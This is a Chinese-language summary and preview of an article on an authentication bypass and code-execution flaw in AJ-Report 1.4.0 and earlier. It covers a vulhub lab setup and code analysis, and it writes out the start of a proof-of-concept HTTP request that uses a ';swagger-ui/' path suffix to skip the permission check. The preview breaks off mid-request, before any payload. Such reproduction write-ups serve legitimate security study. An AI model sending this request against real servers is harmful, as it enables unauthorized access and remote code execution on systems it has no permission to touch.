主要观点总结
文章介绍了AJ-Report平台存在的认证绕过漏洞及其环境搭建、poc测试、漏洞分析和关键代码分析等内容。
关键观点总结
关键观点1: AJ-Report 1.4.0版本及以前存在认证绕过漏洞
攻击者可以利用该漏洞绕过权限校验并执行任意代码,影响平台的安全性。
关键观点2: 环境搭建和poc测试
通过vulhub启动AJ-Report 1.4.0服务器,使用特定的HTTP请求进行认证绕过测试。
关键观点3: 漏洞分析和关键代码分析
分析了DataSetParamController中的verification方法,以及ScriptEngine在其中的作用,并指出ScriptEngineManager获取名为“JavaScript”的脚本引擎存在的安全风险。
文章预览
AJ-Report是全开源的一个BI平台。在其1.4.0版本及以前,存在一处认证绕过漏洞,攻击者利用该漏洞可以绕过权限校验并执行任意代码。 漏洞复现 漏洞环境 vulhub 执行如下命令启动一个AJ-Report 1.4.0服务器: docker compose up -d 服务启动后,你可以在 http://your-ip:9095 查看到登录页面。 poc POST /dataSetParam/verification;swagger-ui/ HTTP/1.1 Host: your-ip:9095 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/json;charset=UTF-8 Connection: close Content-Length: 339 { "ParamName" : "" , "paramDesc" : "" , "paramType" : "" , "sampleItem" : "1" , "mandatory" : true , "requiredFl
………………………………
